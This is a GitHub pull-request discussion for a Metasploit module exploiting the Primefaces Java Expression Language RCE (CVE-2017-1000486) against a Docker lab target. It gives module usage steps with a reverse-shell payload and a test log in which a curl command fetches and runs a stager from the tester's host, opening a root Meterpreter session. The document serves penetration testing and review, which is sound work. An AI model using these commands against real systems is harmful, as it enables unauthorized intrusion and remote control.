Primefaces RCE (CVE-2017-1000486)

[h00die]

fixes #18946

This one is super old, but it was in the Issues list as a half constructed module (chatgpt conversion?), so figured I'd get it up to standards.

Exploits an RCE in Primefaces. Docker image included, real easy to setup and exploit. Only certain payloads work on the docker image though, so check the docs.

Verification

• Install the application
• Start msfconsole
• Do: use exploit/linux/http/primefaces_weak_encryption_rce
• Do: set rhosts <ip>>
• Do: set verbose true
• Do: set payload payload/cmd/unix/reverse_jjs
• You should get a shell.

[jheysel-r7]

Thanks for the module @h00die. Two very minor suggestions. Testing was as expected:

msf6 exploit(multi/http/primefaces_weak_encryption_rce) > run

[*] Command to run on remote host: curl -so ./FQvScHoFLKS http://172.16.199.158:8080/nig1HLQ-oGgo_qtiZX9DSQ; chmod +x ./FQvScHoFLKS; ./FQvScHoFLKS &
[*] Fetch handler listening on 172.16.199.158:8080
[*] HTTP server started
[*] Adding resource /nig1HLQ-oGgo_qtiZX9DSQ
[*] Started reverse TCP handler on 172.16.199.158:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Victim evaluates java Expression Language expressions
[*] Attempting to execute: curl -so ./FQvScHoFLKS http://172.16.199.158:8080/nig1HLQ-oGgo_qtiZX9DSQ; chmod +x ./FQvScHoFLKS; ./FQvScHoFLKS &
[*] Client 172.17.0.2 requested /nig1HLQ-oGgo_qtiZX9DSQ
[*] Sending payload to 172.17.0.2 (curl/7.64.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 3 opened (172.16.199.158:4444 -> 172.17.0.2:37326) at 2024-12-05 09:48:36 -0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Debian 10.10 (Linux 5.15.0-125-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit

I was getting an error when loading the module but realized it's not an issue and was due to this PR not having this fix in it: 6be0182#diff-3047a726f420e77dc5d2b2b2116a4e97a26cd5d1a0fbff495e0302e8bc2b3d80R909

[h00die]

I was getting an error when loading the module but realized it's not an issue and was due to this PR not having this fix in it: 6be0182#diff-3047a726f420e77dc5d2b2b2116a4e97a26cd5d1a0fbff495e0302e8bc2b3d80R909

yea, its very annoying

[h00die]

all updated, i found a good URL for that link

[jheysel-r7]

Just standardizing the capitalization of "Java Expression Language". Looks great, landing now.

[jheysel-r7]

Release Notes

This adds a module which exploits a Java Expression Language RCE vulnerability in the Primefaces JSF framework. Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.